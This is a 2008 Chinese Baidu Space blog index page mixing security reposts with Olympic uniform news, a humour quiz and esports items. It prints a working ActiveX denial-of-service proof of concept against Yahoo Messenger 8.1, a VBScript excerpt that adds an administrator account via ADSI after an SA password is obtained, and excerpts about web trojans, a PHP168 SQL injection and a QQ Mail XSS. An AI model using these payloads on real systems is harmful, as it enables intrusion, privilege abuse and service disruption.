百度首页 | 百度空间
 
文章列表
 
2008-07-16 13:01

转自:SEBUG

Yahoo Messenger 8.1 (latest) Remote DoS
Safe for Scripting, Safe for Initialize

<html><body>

<object id=target classid=clsid:02478D38-C3F9-4EFB-9B51-7695ECA05670></object>
<script language=vbscript>

arg1=String(517140, "A")
target.c arg1

</script>
</body></html>
PS:这个IM软件我断断续续的安过几次~总体感觉挺清新 不过用的人少~哎~前几天刚装的 就又爆了漏洞~
类别:网络安全 | 评论(0) | 浏览()
 
2008-07-16 12:45

2008年7月15日,北京2008年奥运会中国体育代表团领奖服正式亮相,领奖服主色调源于国旗的红、黄两色,设计采用祥云图案,象征吉祥美好,极具中国特色和很强的时代感。




国体育代表团领奖服  
新民网7月15日讯   2008年7月15日,北京2008年奥运会中

类别:无聊日记 | 评论(0) | 浏览()
 
2008-07-15 14:02

测测你是否有搜索引擎依赖症

  1.当别人向你请教一个问题,你10秒内无法想出答案时,你是否会回答去网上搜索一下?

  2.当你在写一篇文档(包括中文和英文文档),需要斟酌某个字句时,你是否会打开搜索引擎寻找答案?

  3.当你挂在网上无所事事的时候,你是否会打开一个搜索引擎的页面发呆或随便在里面输入一个想到的词随意搜索?

  4.当你看到一个网站的广告时,你是否基本不去留意网站的网址,而只是记住网站的名称留待以后需要的时候搜索一下?

  5.当你需

类别:暴笑网文 | 评论(4) | 浏览()
 
2008-07-15 01:56

转自:tr4c3

From: http://www.blogjava.net/baicker/archive/2008/07/14/214835.html

lcx给的,网上的都是放启动项,这个可以自动执行

<
script type="text/javascript"

类别:网络安全 | 评论(0) | 浏览()
 
2008-07-14 05:29
随着梦之队欧洲 MYM DreamTeam战队不战而胜的以4:0取得了对波兰 Betsson Voodoo Gaming战队的积分;睿智亡灵
类别:电子竞技 | 评论(0) | 浏览()
 
2008-07-13 12:52
发布时间:2008-07-11
影响版本:
Php168 v2008
描述:
历经数年开发与完善的”PHP168整站系统”是国内最早的多功能模块化 网站管理软件系统;不仅适合于建设一般的企业、政府、学校、个人等小型网站,同时也适合于建设地区门户、行业门户、收费网站等大中型网站,80sec在其 产品中发现了一个严重的SQL注射漏洞,可能被恶意用户查询数据库的敏感信息,如管理员密码,加密key等等,从而控制整个网站。
在系统的jsarticle.php中,使用了urldecode用来解码用户提交的数据,但是
类别:网络安全 | 评论(0) | 浏览()
 
2008-07-11 14:17
作者: 王岗 出处:51CTO.com

在获得SA密码后,往往因为服务器管理者或”前人”将net.exe和net1.exe被限制使用,无法添加管理员账号。我们知道VBS在活动目录(ADSI)部分有一个winnt对象,用来管理本地资源,利用它可以不依靠CMD等命令就能添加一个管理员,具体代码如下:
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os) '得到adsi接口,绑定
Set oe=GetObject(os&"/Administrato
类别:网络安全 | 评论(0) | 浏览()
 
2008-07-10 12:27

作者:lcx
来源:vbs小铺

测试此网马不必要装access,只需单独装一个SNAPVIEW.EXE就可以测试(微软有下),不过我没有找到这个控件的可执行的方法,只能将网马的exe用js判断系统的语言选项后放在启动项里。装ACESS的用户要小心了。下边是我eXeScope 找到此此ActiveX的Property和Method。

SnapshotViewerControl; // Snapshot Viewer Control

Enum SnapZoom;
snapZoomToFit = 0;
snapZoomToFill = 1;
snapZoom200Percent = 2;
snapZoom150Percent = 3;
snapZoom100Percent = 4;

类别:网络安全 | 评论(1) | 浏览()
 
2008-07-09 14:14

微软公布了七月安全公告的预告,本月微软发布了四个重要等级的更新.
其中2个影响Windows,1个是SQL的提权漏洞,1个Exchange Server的提权漏洞.这些漏洞届时都可以被Baseline Security Analyzer检测并更新.对于 2008年7月发布的安全公告,本公告摘要替代2008年7月3日最初发布的公告预先通知.

查看:

类别:网络安全 | 评论(0) | 浏览()
 
2008-07-08 11:53
漏洞说明:QQ Mail是Tencent公司提供的webmail服务,你可以使用你的QQ帐户来登陆使用Mail服务,具体的信息可以访问 http://mail.qq.com/。但是80sec团队成员在QQ Mail里发现存在跨站脚本漏洞,恶意用户可以通过该漏洞在邮件里伪造登陆表单窃取目标用户的密码以及偷取Cookie以取得其他用户的身份,或者使用 ajax等技术读取用户的敏感信息。

漏洞成因:QQ Mail的Javascript Dom部分在处理邮件内容
类别:网络安全 | 评论(3) | 浏览()
 
     
 
 
文章分类
 
 
 
 
 
 
 
 
     
 
文章存档
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
     
 
最新文章评论
   

这代码真像外星语
 
 

不懂 不过点了你就留个印记
 

不会..
 

上次登录:28天前

百度空间也有漏洞???
 
     


©2008 Baidu